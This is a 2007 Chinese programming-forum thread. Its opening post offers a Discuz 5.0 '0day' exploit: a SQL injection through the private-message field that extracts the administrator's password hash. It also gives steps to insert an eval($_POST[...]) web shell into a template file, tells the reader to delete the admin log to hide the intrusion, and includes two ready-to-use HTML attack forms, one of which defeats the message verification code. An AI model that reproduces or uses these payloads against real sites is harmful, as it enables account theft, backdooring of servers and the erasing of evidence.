| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 353 人关注过本帖
标题:Discuz 5.0 0day + PM短信饶过方法
只看楼主 加入收藏
什么是么什
Rank: 1
等 级:新手上路
帖 子:83
专家分:0
注 册:2007-4-11
收藏
 问题点数:0 回复次数:1 
Discuz 5.0 0day + PM短信饶过方法

SQL:
0) union select password,2,0 from cdb_members where uid=1/*
uid=1/* 1
就是ID值

获得管理员md5密码后
进后台
论坛管理 模块编辑 详情
修改wap.php插入
eval($_POST[tlwbw])
连接地址
网站地址+/templates/default/wap.lang.php

哈哈进过后台别忘了清掉forumdata/cplog.php

利用代码 保存为 .html
以下是引用片段:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Dz5.0 0day</TITLE>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<META content="MSHTML 6.00.3790.2858" name=GENERATOR></HEAD>
<BODY>
<STYLE>BODY {
SCROLLBAR-FACE-COLOR: #e4e4f3; FONT-SIZE: 9pt; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #e4e4f3; COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #e4e4f3; SCROLLBAR-ARROW-COLOR: #4444b3; SCROLLBAR-TRACK-COLOR: #efefef; FONT-FAMILY: "Courier New"; SCROLLBAR-DARKSHADOW-COLOR: #9c9cd3
}
TABLE {
BORDER-RIGHT: #d8d8f0 1px; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px; FONT-FAMILY: "Courier New"; BORDER-COLLAPSE: collapse
}
.tr {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3; TEXT-ALIGN: center
}
.td {
FONT-SIZE: 9pt; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
.warningColor {
FONT-SIZE: 9pt; COLOR: #ff0000; FONT-FAMILY: "Courier New"
}
INPUT {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
TEXTAREA {
BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; COLOR: #000000; FONT-FAMILY: "Courier New"; BORDER-RIGHT-WIDTH: 1px
}
A:link {
FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; TEXT-DECORATION: none
}
TR {
FONT-SIZE: 9pt; LINE-HEIGHT: 18px; FONT-FAMILY: "Courier New"
}
TD {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px; FONT-SIZE: 9pt; BORDER-LEFT: #d8d8f0 1px; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"
}
.trHead {
FONT-SIZE: 9pt; LINE-HEIGHT: 3px; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #e4e4f3
}
.inputLogin {
BORDER-RIGHT: #d8d8f0 1px solid; BORDER-TOP: #d8d8f0 1px solid; FONT-SIZE: 9pt; VERTICAL-ALIGN: bottom; BORDER-LEFT: #d8d8f0 1px solid; BORDER-BOTTOM: #d8d8f0 1px solid; FONT-FAMILY: "Courier New"; BACKGROUND-COLOR: #f9f9fd
}
</STYLE>

<SCRIPT language=JavaScript>
<!--
test='width="760" <table align="center" border="0" cellspacing="0"><form cellpadding="0" height="22" method="post"><tr><td Exp</td></tr><tr><td class="td">&nbsp;Dz5.0 height="18" class="trHead">&nbsp;</td></tr><tr><td <input class="td">&nbsp;&nbsp;Url: type="text" name="theAction" value="http://www.***.net" id="theAction" onBlur=this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&pmsubmit=yes"><BR><input size="50" type="hidden" name="the2Action" value="">&nbsp;Hash: id="the2Action" type="text" <input value="0094b488">&nbsp;&nbsp;&nbsp;Msgt<input name="formhash" name="msgto" type="text" value="jackal"><BR><input size="10" name="subject" type="hidden" value="aa"><input size="10" name="message" type="hidden" <input value="aa">&nbsp;&nbsp;SQL: size="100" type="text" value="0) name="msgtobuddys[]" select union from password,2,0 where cdb_members class="td" uid=1/*"></td></tr><tr><td type="submit" align="center"><input value=" name="Submit" " GOGOGO type="reset" onClick="this.form.action=this.form.the2Action.value;"><input value=" name="Submit32" "></td></tr><tr><td Reset height="22" class="trHead">&nbsp;</td></tr><tr><td class="td">Powered align="right" <a By title="QQ:***">***</a> href="http://www***.net" </tr> 2007.3&nbsp;</td> </table> </form>';
document.write(ReplaceDemo(test))
//-->
</SCRIPT>

<TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
<FORM method=post>
<TBODY>
<TR>
<TD class=td height=22>&nbsp;Dz5.0 Exp</TD></TR>
<TR>
<TD class=trHead>&nbsp;</TD></TR>
<TR>
<TD class=td height=18>&nbsp;&nbsp;Url: <INPUT id=theAction
onblur='this.form.the2Action.value=this.form.theAction.value+"/pm.php?action=send&amp;pmsubmit=yes"'
size=50 value=http://www.4evil.org name=theAction><BR><INPUT
id=the2Action type=hidden name=the2Action>&nbsp;Hash: <INPUT
value=0094b488 name=formhash>&nbsp;&nbsp;&nbsp;Msgt<INPUT size=10
value=aspxp name=msgto><BR><INPUT type=hidden size=10 value=aa
name=subject><INPUT type=hidden value=aa name=message>&nbsp;&nbsp;SQL:
<INPUT size=100
value="0) union select password,2,0 from cdb_members where uid=1/*"
name=msgtobuddys[]></TD></TR>
<TR>
<TD class=td align=middle><INPUT onclick=this.form.action=this.form.the2Action.value; type=submit value=" Enter " name=Submit><INPUT type=reset value=" Reset " name=Submit32></TD></TR>
<TR>
<TD class=trHead>&nbsp;</TD></TR>
<TR>
<TD class=td align=right height=22>Just For Fun <A title=QQ:****
href="http://www.****.org">****</A>
2007.3&nbsp;</TD></TR></FORM></TBODY></TABLE></BODY></HTML>

PM漏洞过短信验证的方法: (来源7贱的BLOG)

<HTML><HEAD><TITLE>discuz</TITLE>
<BODY>
<a href="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#49;&#118;&#49;&#46;&#110;&#97;&#109;&#101;">&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#49;&#118;&#49;&#46;&#110;&#97;&#109;&#101;</a><FORM name=frm method=post target=_blank>Url: <INPUT
size=45 name=act>&nbsp;<INPUT
size=8 name=formhash>&nbsp;<INPUT onclick="Javascipt:action=document.all.act.value+'pm.php?action=send';frm.submit();" type=button value="提 交" name=Send><br><br>
MySQL:<INPUT
size=65 value='0) union select password,2,0 from cdb_members where uid=1/*'name=msgtobuddys[]>
<input type="text" name="seccodeverify" size="7">
<INPUT TYPE="hidden" NAME="pmsubmit" value="2">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
</FORM>
</BODY></HTML>

搜索更多相关主题的帖子: where 管理员 PUBLIC default password 
2007-04-27 23:57
PcrazyC
Rank: 6Rank: 6
等 级:贵宾
威 望:29
帖 子:5652
专家分:0
注 册:2006-10-20
收藏
得分:0 

有点看不懂


雁无留踪之意,水无取影之心
2007-04-30 23:36
快速回复:Discuz 5.0 0day + PM短信饶过方法
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.042914 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved